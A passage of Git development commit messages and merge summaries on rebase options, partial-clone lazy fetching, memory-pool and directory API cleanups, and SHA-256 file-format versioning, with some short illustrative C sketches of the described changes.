by 'git am' that are not implemented in the merge backend. This means
that the available options differ depending on which backend is
used, which is confusing. This patch adds support for the --ignore-date
option to the merge backend. This option uses the current time as the
author date rather than reusing the original author date when
rewriting commits. We take care to handle the combination of
--ignore-date and --committer-date-is-author-date in the same way as
the apply backend.
Original-patch-by: Rohit Ashiwal <rohit.ashiwal265@gmail.com>
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The FETCH_HEAD and MERGE_HEAD refs must be stored in a file, regardless of the
type of ref backend. This is because they can hold more than just a single ref.
To accommodate them for alternate ref backends, read them from a file generically
in refs_read_raw_ref().
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This prepares for handling FETCH_HEAD (which is not a regular ref)
separately from the ref backend.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The dir structure seemed to have a number of leaks and problems around
it. First I noticed that parent_hashmap and recursive_hashmap were
being leaked (though Peff noticed and submitted fixes before me). Then
I noticed in the previous commit that clear_directory() was only taking
responsibility for a subset of fields within dir_struct, despite the
fact that entries[] and ignored[] were allocated internally to dir.c.
That, of course, resulted in many callers either leaking or haphazardly
trying to free these arrays and their contents.
Digging further, I found that despite the pretty clear documentation
near the top of dir.h that folks were supposed to call clear_directory()
when the user no longer needed the dir_struct, there were four callers
that didn't bother doing that at all. However, two of them clearly
thought about leaks since they had an UNLEAK(dir) directive, which to me
suggests that the method to free the data was too unclear. I suspect
the non-obviousness of the API and its holes led folks to avoid it,
which then snowballed into further problems with the entries[],
ignored[], parent_hashmap, and recursive_hashmap problems.
Rename clear_directory() to dir_clear() to be more in line with other
data structures in git, and introduce a dir_init() to handle the
suggested memsetting of dir_struct to all zeroes. I hope that a name
like "dir_clear()" is more clear, and that the presence of dir_init()
will provide a hint to those looking at the code that they need to look
for either a dir_clear() or a dir_free() and lead them to find
dir_clear().
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The calling convention for the dir API is supposed to end with a call to
clear_directory() to free up no longer needed memory. However,
clear_directory() didn't free dir->entries or dir->ignored. I believe
this was an oversight, but a number of callers noticed memory leaks and
started free'ing these. Unfortunately, they did so somewhat haphazardly
(sometimes freeing the entries in the arrays, and sometimes only
free'ing the arrays themselves). This suggests the callers weren't
trying to make sure any possible memory used might be free'd, but just
the memory they noticed their usecase definitely had allocated.
Fix this mess by moving all the duplicated free'ing logic into
clear_directory(). End by resetting dir to a pristine state so it could
be reused if desired.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that Git has switched to using a subprocess to lazy-fetch missing
objects, remove the no_dependents code as it is no longer used.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Teach Git to lazy-fetch missing objects in a subprocess instead of doing
it in-process. This allows any fatal errors that occur during the fetch
to be isolated and converted into an error return value, instead of
causing the current command being run to terminate.
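
The isolation described above can be sketched with plain POSIX calls.
This is not the code Git uses (Git has its own run-command machinery);
run_isolated() is a hypothetical helper that only shows how a fatal
exit in the child becomes an ordinary error return in the parent.

```c
#include <assert.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Run argv[0] with the given arguments in a child process.
 * Returns 0 if the child exited with status 0, and -1 otherwise
 * (fork failure, exec failure, non-zero exit, or death by signal).
 * The caller keeps running in every case.
 */
static int run_isolated(char *const argv[])
{
	pid_t pid;
	int status;

	assert(argv && argv[0]);
	pid = fork();
	if (pid < 0)
		return -1;
	if (pid == 0) {
		execvp(argv[0], argv);
		_exit(127); /* only reached if exec failed */
	}
	while (waitpid(pid, &status, 0) < 0) {
		if (errno != EINTR)
			return -1;
	}
	if (WIFEXITED(status) && WEXITSTATUS(status) == 0)
		return 0;
	return -1;
}
```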
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Whitespace is ignored when calculating patch IDs. This is done by
removing all whitespace from diff lines before hashing them, including
a newline at the end of a file. If that newline is missing, however,
diff reports that fact in a separate line containing "\ No newline at
end of file\n", and this marker is hashed like a context line.
This goes against our goal of making patch IDs independent of
whitespace. Use the same heuristic that 2485eab55c (git-patch-id: do
not trip over "no newline" markers, 2011-02-17) added to git patch-id
instead and skip diff lines that start with a backslash and a space
and are longer than twelve characters.
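
A minimal sketch of the heuristic, assuming each diff line is handed
over with its length. The function names are made up for illustration
and the real hashing step is omitted.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/*
 * Return 1 if the diff line looks like the "\ No newline at end of
 * file" marker: it starts with a backslash and a space and is longer
 * than twelve characters. Such lines are skipped, not hashed.
 */
static int is_no_newline_marker(const char *line, size_t len)
{
	assert(line);
	return len > 12 && line[0] == '\\' && line[1] == ' ';
}

/*
 * Copy src to dst with all whitespace removed and return the number
 * of bytes kept. dst must have room for len bytes.
 */
static size_t strip_whitespace(char *dst, const char *src, size_t len)
{
	size_t i, kept = 0;

	assert(dst && src);
	for (i = 0; i < len; i++)
		if (!isspace((unsigned char)src[i]))
			dst[kept++] = src[i];
	return kept;
}
```

A caller would test each line with is_no_newline_marker() first and
feed only the remaining lines, stripped of whitespace, to the hash.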
Reported-by: Tilman Vogel <tilman.vogel@web.de>
Initial-test-by: Tilman Vogel <tilman.vogel@web.de>
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This if statement never evaluates to true since we already check
state->force a few lines above, and immediately return when it is
false.
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In order to determine negotiation tips, "fetch-pack" iterates over all
refs and dereferences all annotated tags found. This causes the
existence of targets of refs and annotated tags to be checked. Avoiding
this is especially important when we use "git fetch" (which invokes
"fetch-pack") to perform lazy fetches in a partial clone because a
target of such a ref or annotated tag may itself need to be lazy-fetched
(which, if not avoided, causes an infinite loop).
Therefore, teach "fetch-pack" not to lazy fetch whenever iterating over
refs. This is done by using the raw form of ref iteration and by
dereferencing tags ourselves.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In "fetch", get_ref_map() iterates over all refs to populate
"existing_refs" in order to populate peer_ref->old_oid in the returned
refmap, even if the refmap has no peer_ref set - which is the case when
only literal hashes (i.e. no refs by name) are fetched.
Iterating over refs causes the targets of those refs to be checked for
existence. Avoiding this is especially important when we use "git fetch"
to perform lazy fetches in a partial clone because a target of such a
ref may itself need to be lazy-fetched (which, if not avoided, causes
an infinite loop).
Therefore, avoid populating "existing_refs" until necessary. With this
patch, because Git lazy-fetches objects by literal hashes (to be done in
a subsequent commit), it will then be able to guarantee avoiding reading
targets of refs.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In "fetch", there are two parameters submodule_fetch_jobs_config and
recurse_submodules that can be set in a variety of ways: through
.gitmodules, through .git/config, and through the command line.
Currently "fetch" handles this by first reading .gitmodules, then
reading .git/config (allowing it to overwrite existing values), then
reading the command line (allowing it to overwrite existing values).
Notice that we can avoid reading .gitmodules if .git/config and/or the
command line already provides us with what we need. In addition, if
recurse_submodules is found to be "no", we do not need the value of
submodule_fetch_jobs_config.
Avoiding reading .gitmodules is especially important when we use "git
fetch" to perform lazy fetches in a partial clone because the
.gitmodules file itself might need to be lazy-fetched (which, if not
avoided, causes an infinite loop).
In light of all this, avoid reading .gitmodules until necessary. When
reading it, we may only need one of the two parameters it provides, so
teach fetch_config_from_gitmodules() to support NULL arguments. With
this patch, users (including Git itself when invoking "git fetch" to
lazy-fetch) will be able to guarantee avoiding reading .gitmodules by
passing --recurse-submodules=no.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a subsequent patch, partial clones will be taught to fetch missing
objects using a "git fetch" subprocess. Because the number of objects
fetched may be too numerous to fit on the command line, teach "fetch" to
accept refspecs passed through stdin.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a noop fetch negotiator. This is introduced to allow partial clones
to skip the unneeded negotiation step when fetching missing objects
using a "git fetch" subprocess. (The implementation of spawning a "git
fetch" subprocess will be done in a subsequent patch.) But this can also
be useful for end users, e.g. as a blunt fix for object corruption.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If you run fetch and record the result in remote-tracking branches,
and you either do nothing with the fetched refs (e.g. you are
merely mirroring) or always work from the remote-tracking
refs (e.g. you fetch and then merge origin/branchname separately),
you can get away with having no FETCH_HEAD at all.
Teach "git fetch" a command line option "--[no-]write-fetch-head".
The default is to write FETCH_HEAD, and the option is primarily
meant to be used with the "--no-" prefix to override this default,
because there is no matching fetch.writeFetchHEAD configuration
variable to flip the default to off (in which case, the positive
form may become necessary to defeat it).
Note that under "--dry-run" mode, FETCH_HEAD is never written;
otherwise you'd see a list of objects in the file that you do not
actually have. Passing `--write-fetch-head` does not force `git
fetch` to write the file.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
About half the function declarations in mem-pool.h used 'struct mem_pool
*pool', while the other half used 'struct mem_pool *mem_pool'. Make the
code a bit more consistent by just using 'pool' in preference to
'mem_pool' everywhere.
No behavioral changes included; this is just a mechanical rename (though
a line or two was rewrapped as well).
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A typical memory type, such as strbuf, hashmap, or string_list, can be
stored on the stack or embedded within another structure. mem_pool
cannot be, because of how mem_pool_init() and mem_pool_discard() are
written. mem_pool_init() does essentially the following (simplified
for purposes of explanation here):
void mem_pool_init(struct mem_pool **pool...)
{
*pool = xcalloc(1, sizeof(**pool));
It seems weird to require that mem_pools can only be accessed through a
pointer. It also seems slightly dangerous: unlike strbuf_release() or
strbuf_reset() or string_list_clear(), all of which put the data
structure into a state where it can be re-used after the call,
mem_pool_discard(pool) will leave pool pointing at free'd memory.
read-cache (and split-index) are the only current users of mem_pools,
and they haven't fallen into a use-after-free mistake here, but it seems
likely to be problematic for future users especially since several of
the current callers of mem_pool_init() will only call it when the
mem_pool* is not already allocated (i.e. is NULL).
This type of mechanism also prevents finding synchronization
points where one can free existing memory and then resume more
operations. It would be natural at such points to run something like
mem_pool_discard(pool...);
and, if necessary,
mem_pool_init(&pool...);
and then carry on continuing to use the pool. However, this fails badly
if several objects had a copy of the value of pool from before these
commands; in such a case, those objects won't get the updated value of
pool that mem_pool_init() overwrites pool with and they'll all instead
be reading and writing from free'd memory.
Modify mem_pool_init()/mem_pool_discard() to behave more like
strbuf_init()/strbuf_release()
or
string_list_init()/string_list_clear()
In particular: (1) make mem_pool_init() just take a mem_pool* and have
it only worry about allocating struct mp_blocks, not the struct mem_pool
itself, (2) make mem_pool_discard() free the memory that the pool was
responsible for, but leave it in a state where it can be used to
allocate more memory afterward (without the need to call mem_pool_init()
again).
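
To make the intended lifecycle concrete, here is a small sketch of a
pool that can live on the stack and be reused after being discarded.
The toy_pool names, block size, and alignment rule are assumptions made
for this illustration; this is not the mem-pool.c implementation.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

#define TOY_BLOCK_SIZE 4096

/* Rounding unit chosen so that successive allocations stay aligned. */
union toy_align { long double ld; long long ll; void *p; };
#define TOY_ALIGN sizeof(union toy_align)

struct toy_block {
	struct toy_block *next;
	size_t used, cap;
	unsigned char *data;
};

/* The pool itself is a plain value; only its blocks are heap-allocated. */
struct toy_pool {
	struct toy_block *blocks;
};

static void toy_pool_init(struct toy_pool *pool)
{
	assert(pool);
	pool->blocks = NULL;
}

/* Bump-allocate len bytes, adding a new block when the newest one is full. */
static void *toy_pool_alloc(struct toy_pool *pool, size_t len)
{
	struct toy_block *b;
	void *ret;

	assert(pool);
	len = (len + TOY_ALIGN - 1) / TOY_ALIGN * TOY_ALIGN;
	b = pool->blocks;
	if (!b || b->cap - b->used < len) {
		size_t cap = len > TOY_BLOCK_SIZE ? len : TOY_BLOCK_SIZE;

		b = malloc(sizeof(*b));
		if (!b)
			abort();
		b->data = malloc(cap);
		if (!b->data)
			abort();
		b->cap = cap;
		b->used = 0;
		b->next = pool->blocks;
		pool->blocks = b;
	}
	ret = b->data + b->used;
	b->used += len;
	return ret;
}

/* Free all blocks but leave the pool valid for further allocations. */
static void toy_pool_discard(struct toy_pool *pool)
{
	struct toy_block *b, *next;

	assert(pool);
	for (b = pool->blocks; b; b = next) {
		next = b->next;
		free(b->data);
		free(b);
	}
	pool->blocks = NULL;
}
```

Because the struct itself is never freed, every object holding a
pointer to the pool still sees a valid pool after a discard.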
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
fast-import had a special mem_pool_strdup() convenience function that I
want to be able to use from the new merge algorithm I am writing. Move
it from fast-import to mem-pool, and also add a mem_pool_strndup()
while at it that I also want to use.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
git subtree push does not support --squash, as previously illustrated in
6ccc71a9 (contrib/subtree: there's no push --squash, 2015-05-07).
Signed-off-by: Danny Lin <danny0838@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Revise the documentation and remove previous "unsure" after making sure
that --message supports only 'add', 'merge', 'pull', and 'split --rejoin'.
Signed-off-by: Danny Lin <danny0838@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Earlier, to countermand the implicit "-m" option when the
"--first-parent" option is used with "git log", we added the
"--[no-]diff-merges" option in the jk/log-fp-implies-m topic. To
leave the door open to allow the "--diff-merges" option to take
values that instruct how patches for merge commits should be
computed (e.g. "cc"? "-p against first parent"?), redefine
"--diff-merges" to take a non-optional value, and implement "off"
that means the same thing as "--no-diff-merges".
* so/log-diff-merges-opt:
t/t4013: add test for --diff-merges=off
doc/git-log: describe --diff-merges=off
revision: change "--diff-merges" option to require parameter
"git log --first-parent -p" showed patches only for single-parent
commits on the first-parent chain; the "--first-parent" option has
been made to imply "-m". Use "--no-diff-merges" to restore the
previous behaviour to omit patches for merge commits.
* jk/log-fp-implies-m:
doc/git-log: clarify handling of merge commit diffs
doc/git-log: move "-t" into diff-options list
doc/git-log: drop "-r" diff option
doc/git-log: move "Diff Formatting" from rev-list-options
log: enable "-m" automatically with "--first-parent"
revision: add "--no-diff-merges" option to counteract "-m"
log: drop "--cc implies -m" logic
Recent versions of "git diff-files" show a diff between the index
and the working tree for "intent-to-add" paths as a "new file"
patch; "git apply --cached" should be able to take "git diff-files"
and should act as an equivalent to "git add" for the path, but the
command failed to do so for such a path.
* rp/apply-cached-with-i-t-a:
t4140: test apply with i-t-a paths
apply: make i-t-a entries never match worktree
apply: allow "new file" patches on i-t-a entries
"git bisect" learns the "--first-parent" option to find the first
breakage along the first-parent chain.
* al/bisect-first-parent:
bisect: combine args passed to find_bisection()
bisect: introduce first-parent flag
cmd_bisect__helper: defer parsing no-checkout flag
rev-list: allow bisect and first-parent flags
t6030: modernize "git bisect run" tests
A no-op replacement function implemented as a C preprocessor macro
does not perform as good a job as one implemented as a "static
inline" function in catching errors in parameters; replace the
former with the latter in <git-compat-util.h> header.
* jc/noop-with-static-inline:
compat-util: type-check parameters of no-op replacement functions
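
The difference between the two styles of no-op replacement can be seen
in a small sketch. The names below are invented for illustration and do
not correspond to anything in <git-compat-util.h>.

```c
#include <assert.h>

/* Macro version: the arguments vanish before the compiler sees them. */
#define toy_noop_macro(path, mode) (0)

/* Function version: does nothing, but its parameters are type-checked. */
static inline int toy_noop_fn(const char *path, int mode)
{
	(void)path;
	(void)mode;
	return 0;
}

static int demo(void)
{
	/* Nonsense arguments compile silently with the macro. */
	int a = toy_noop_macro(42, "not a mode");
	int b = toy_noop_fn("file.txt", 0644);

	/*
	 * toy_noop_fn(42, "not a mode") would draw a diagnostic here,
	 * which is the point of preferring the static inline form.
	 */
	assert(a == b); /* both evaluate to 0 */
	return a + b;
}
```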
The existing backends for "git mergetool" based on variants of vim
have been refactored and then support for "nvim" has been added.
* pd/mergetool-nvimdiff:
mergetools: add support for nvimdiff (neovim) family
mergetool--lib: improve support for vimdiff-style tool variants
Further preliminary change to refs API.
* hn/reftable-prep-part-2:
Make HEAD a PSEUDOREF rather than PER_WORKTREE.
Modify pseudo refs through ref backend storage
t1400: use git rev-parse for testing PSEUDOREF existence
Stop when "sendmail.*" configuration variables are defined, which
could be a mistaken attempt to define "sendemail.*" variables.
* dd/send-email-config:
git-send-email: die if sendmail.* config is set
The logic to find the ref transaction hook script attempted to
cache the path to the found hook without realizing that it needed
to keep a copied value, as the API it used returned a transitory
buffer space. This has been corrected.
* ps/ref-transaction-hook:
t1416: avoid hard-coded sha1 ids
refs: fix interleaving hook calls with reference-transaction hook
Similar to the commit-graph format, the multi-pack-index format has a
byte in the header intended to track the hash version used to write the
file. This allows one to interpret the hash length without having the
context of the repository config specifying the hash length. This was
not modified as part of the SHA-256 work because the hash length was
automatically up-shifted due to that config.
Since we have this byte available, we can make the file formats more
obviously incompatible instead of relying on other context from the
repository.
Add a new oid_version() method in midx.c similar to the one in
commit-graph.c. This is specifically made separate from that
implementation to avoid artificially linking the formats.
The test impact requires a few more things than the corresponding change
in the commit-graph format. Specifically, 'test-tool read-midx' was not
writing anything about this header value to output. Since the value
available in 'struct multi_pack_index' is hash_len instead of a version
value, we output "20" or "32" instead of "1" or "2".
Since we want a user to not have their Git commands fail if their
multi-pack-index has the incorrect hash version compared to the
repository's hash version, we relax the die() to an error() in
load_multi_pack_index(). This has some effect on 'git multi-pack-index
verify' as we need to check that a failed parse of a file that exists is
actually a verify error. For that test that checks the hash version
matches, we change the corrupted byte from "2" to "3" to ensure the test
fails for both hash algorithms.
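
A sketch of the two ideas in this message: mapping the hash algorithm
to the header byte (1 for SHA-1, 2 for SHA-256) and reporting a
mismatch as an error instead of dying. The enum and function names are
hypothetical and the real code lives in midx.c.

```c
#include <assert.h>
#include <stdio.h>

enum toy_hash { TOY_SHA1, TOY_SHA256 };

/* Version byte stored in the file header for a given hash algorithm. */
static unsigned char toy_oid_version(enum toy_hash algo)
{
	switch (algo) {
	case TOY_SHA1:
		return 1;
	case TOY_SHA256:
		return 2;
	}
	assert(!"unknown hash algorithm");
	return 0;
}

/*
 * Compare the byte read from the file with what the repository
 * expects. A mismatch is reported and returned as -1 so the caller
 * can ignore the file and carry on, rather than aborting the command.
 */
static int toy_check_hash_version(unsigned char file_version,
				  enum toy_hash repo_algo)
{
	unsigned char expected = toy_oid_version(repo_algo);

	if (file_version != expected) {
		fprintf(stderr,
			"error: hash version %u does not match expected %u\n",
			(unsigned)file_version, (unsigned)expected);
		return -1;
	}
	return 0;
}
```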
Helped-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The commit-graph format reserved a byte among the header of the file to
store a "hash version". During the SHA-256 work, this was not modified
because file formats are not necessarily intended to work across hash
versions. If a repository has SHA-256 as its hash algorithm, it
automatically up-shifts the lengths of object names in all necessary
formats.
However, since we have this byte available for adjusting the version, we
can make the file formats more obviously incompatible instead of relying
on other context from the repository.
Update the oid_version() method in commit-graph.c to add a new value, 2,
for sha-256. This automatically writes the new value in a SHA-256
repository _and_ verifies the value is correct. This is a breaking
change relative to the current 'master' branch since 092b677 (Merge
branch 'bc/sha-256-cvs-svn-updates', 2020-08-13) but it is not breaking
relative to any released version of Git.
The test impact is relatively minor: the output of 'test-tool
read-graph' lists the header information, so those instances of '1' need
to be replaced with a variable determined by GIT_TEST_DEFAULT_HASH. A
more careful test is added that specifically creates a repository of
each type then swaps the commit-graph files. The important value here is
that the "git log" command succeeds while writing a message to stderr.
Helped-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the ensure_core_worktree() function, we load the core.worktree value
of the submodule repository using repo_config_get_string(). This
function copies the string, but we never free it, leaking the memory.
We can instead use the "tmp" version of that function to avoid the
allocation at all. We don't have to worry about lifetime issues, since
we never even look at the value (we just want to know if it's set).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We use git_config_get_string() to retrieve the expiry value in a newly
allocated string. But after parsing it, we never free it, leaking the
memory.
We could fix this with a free() obviously, but there's an even better
solution: we can use the non-allocating "tmp" variant of the function;
we only need it to be valid for the lifetime of our parse function.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As evidenced by the leak fixes in the previous commit, the "const" in
git_config_get_string_const() clearly misleads people into thinking that
it does not allocate a copy of the string. We can fix this by renaming
it, but it's easier still to just drop it. Of the four remaining
callers:
- The one in git_config_parse_expiry() still needs to allocate, since
that's what its callers expect. We can just use the non-const
version and cast our pointer. Slightly ugly, but the damage is
contained in one spot.
- The two in apply are writing to global "const char *" variables, and
need to continue allocating. We often mark these as const because we
assign default string literals to them. But in this case we don't do
that, so we can just declare them as real "char *" pointers and use
the non-const version.
- The call in checkout doesn't actually need a copy; it can just use
the non-allocating "tmp" version of the function.
The function is also mentioned in the MyFirstContribution document. We
can swap that call out for the non-allocating "tmp" variant, which fits
well in the example given.
We'll drop the "configset" and "repo" variants, as well (which are
unused).
Note that this frees up the "const" name, so we could rename the "tmp"
variant back to that. But let's give some time for topics in flight to
adapt to the new code before doing so (if we do it too soon, the
function semantics will change but the compiler won't alert us).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Rebase is implemented with two different backends, 'apply' and
'merge', each of which supports a different set of options. In
particular, the apply backend supports a number of options implemented
by 'git am' that are not implemented in the merge backend. This means
that the available options differ depending on which backend is
used, which is confusing. This patch adds support for the
--committer-date-is-author-date option to the merge backend. This
option uses the author date of the commit that is being rewritten as
the committer date when the new commit is created.
Original-patch-by: Rohit Ashiwal <rohit.ashiwal265@gmail.com>
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The implementation of --committer-date-is-author-date exports
GIT_COMMITTER_DATE to override the default committer date but does not
reset GIT_COMMITTER_DATE in the environment after creating the commit
so it is set in the environment of any hooks that get run. We're about
to add the same functionality to the sequencer and do not want to have
GIT_COMMITTER_DATE set when running hooks or exec commands so let's
update commit_tree_extended() to take an explicit committer so we
override the default date without setting GIT_COMMITTER_DATE in the
environment.
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When a file has been deleted the C version of add -p allows the user
to edit a hunk even though 'e' is not in the list of allowed
responses. (I think 'e' is disallowed because if the file is edited it
is no longer a deletion and we're not set up to rewrite the diff
header).
The invalid response was allowed because the test that determines
whether to display 'e' was not duplicated correctly in the code that
processes the user's choice. Fix this by using flags that are set when
constructing the prompt and checked when processing the user's choice
rather than repeating the check itself.
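
The approach can be sketched as follows: decide once, while building
the prompt, which responses are on offer, and consult those flags when
the answer comes back. The flag names and the reduced set of responses
are assumptions for this example, not the actual add -p code.

```c
#include <assert.h>
#include <string.h>

enum toy_prompt_flags {
	TOY_ALLOW_EDIT = 1 << 0,
	TOY_ALLOW_SPLIT = 1 << 1
};

/*
 * Write the list of offered responses into out (at least 8 bytes)
 * and return flags recording exactly what was offered.
 */
static unsigned toy_build_prompt(char *out, size_t cap,
				 int is_deletion, int splittable)
{
	unsigned flags = 0;

	assert(out && cap >= 8);
	strcpy(out, "y,n");
	if (splittable) {
		strcat(out, ",s");
		flags |= TOY_ALLOW_SPLIT;
	}
	if (!is_deletion) {
		strcat(out, ",e");
		flags |= TOY_ALLOW_EDIT;
	}
	return flags;
}

/* Accept a response only if the prompt actually offered it. */
static int toy_response_allowed(unsigned flags, char response)
{
	switch (response) {
	case 'y':
	case 'n':
		return 1;
	case 's':
		return !!(flags & TOY_ALLOW_SPLIT);
	case 'e':
		return !!(flags & TOY_ALLOW_EDIT);
	default:
		return 0;
	}
}
```

Since the condition is evaluated in one place only, the prompt and the
response handling cannot drift apart.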
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This simplifies the code slightly, especially the third case where
hunk_nr was incremented a few lines before ALLOC_GROW().
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Update mingw_unlink() to first try to delete the file with existing
permissions before trying to force it.
Windows throws an error when trying to delete a read-only file. The
mingw_unlink() compatibility wrapper always tries to _wchmod(666) the
file before calling _wunlink() to avoid that error. However, since
most files in the worktree are already writable, this is usually
wasted effort.
Update mingw_unlink() to just call DeleteFileW() directly and if that
succeeds return. If that fails, fall back into the existing code path
to update the permissions and use _wunlink() to get the existing
error code mapping.
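
The "try the cheap path first" structure looks roughly like the sketch
below. It uses POSIX unlink() and chmod() as stand-ins for
DeleteFileW(), _wchmod() and _wunlink(), so it only illustrates the
control flow, not the Windows behavior.

```c
#include <assert.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * Delete path. Most files are already writable, so try the delete
 * directly and only fall back to fixing permissions when it fails.
 */
static int toy_unlink(const char *path)
{
	assert(path);

	/* Fast path: no permission change needed. */
	if (unlink(path) == 0)
		return 0;

	/*
	 * Slow path: make the file writable and retry. The chmod result
	 * is ignored so that errno reflects the final unlink attempt.
	 */
	(void)chmod(path, 0666);
	return unlink(path);
}
```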
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
After eff45daab8 ("repository: enable SHA-256 support by default",
2020-07-29), vanilla builds of Git enable the user to run, e.g.,
git init --object-format=sha256
and hack away. This can be a good way to gain experience with the
SHA-256 world, e.g., to find bugs that
GIT_TEST_DEFAULT_HASH=sha256 make test
doesn't spot.
But it really is a separate world: Such SHA-256 repos will live entirely
separate from the (by now fairly large) set of SHA-1 repos. Interacting
across the border is possible in principle, e.g., through "diff + apply"
(or "format-patch + am"), but even that has its limitations: Applying a
SHA-256 diff in a SHA-1 repo works in the simple case, but if you need
to resort to `-3`, you're out of luck.
Similarly, "push + pull" should work, but you really will be operating
mostly offset from the rest of the world. That might be ok by the time
you initialize your repository, and it might be ok for several months
after that, but there might come a day when you're starting to regret
your use of `git init --object-format=sha256` and have dug yourself into
a fairly deep hole.
There are currently topics in flight to document our data formats and
protocols regarding SHA-256 and in some cases (midx and commit-graph),
we're considering adjusting how the file formats indicate which object
format to use.
Wherever `--object-format` is mentioned in our documentation, let's make
it clear that using it with "sha256" is experimental. If we later need
to explain why we can't handle data we generated back in 2020, we can
always point to this paragraph we're adding here.
By "include::"-ing a small blurb, we should be able to be consistent
throughout the documentation and can eventually gradually tone down the
severity of this text. One day, we might even use it to start phasing
out `--object-format=sha1`, but let's not get ahead of ourselves...
There's also `extensions.objectFormat`, but it's only mentioned three
times. Twice where we're adding this new disclaimer and in the third
spot we already have a "do not edit" warning. From there, interested
readers should eventually find this new one that we're adding here.
Because `GIT_DEFAULT_HASH` provides another entry point to this
functionality, document the experimental nature of it too.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A couple of functions that used struct refspec_item did not zero out the
structure memory. This can result in unexpected behavior, especially if
additional parameters are ever added to refspec_item in the future. Use
memset to ensure that unset structure members are zero.
It may make sense to convert most of these uses of struct refspec_item
to use either struct initializers or refspec_item_init_or_die. However,
other similar code uses memset. Converting all of these uses has been
left as a future exercise.
Signed-off-by: Jacob Keller <jacob.keller@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In commit d27eb356bf ("remote: move doc to remote.h and refspec.h")
the documentation for the refspec structure was moved into refspec.h.
This documentation refers to elements of the refspec_item, not the
struct refspec. Move the documentation slightly in order to align it
with the structure it is actually referring to.
Signed-off-by: Jacob Keller <jacob.keller@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Similar to recent commits, document that we list object names rather
than SHA-1s.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Two of our capabilities contain "sha1" in their names, but that's
historical. Clarify that object names are still to be given using
whatever object format has been negotiated using the "object-format"
capability.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Document that in SHA-1 repositories, we use SHA-1 and in SHA-256
repositories, we use SHA-256, then replace all other uses of "SHA-1"
with something more neutral. Avoid referring to "160-bit" hash values.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Document that rather than always naming objects using SHA-1, we should
use whatever has been negotiated using the object-format capability.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Like f0bca72dc7 (send-pack: use buffered I/O to talk to pack-objects,
2016-06-08), significantly reduce the number of system calls and
simplify the code for sending object IDs to rev-list by using stdio's
buffering.
Take care to handle errors immediately to get the correct error code,
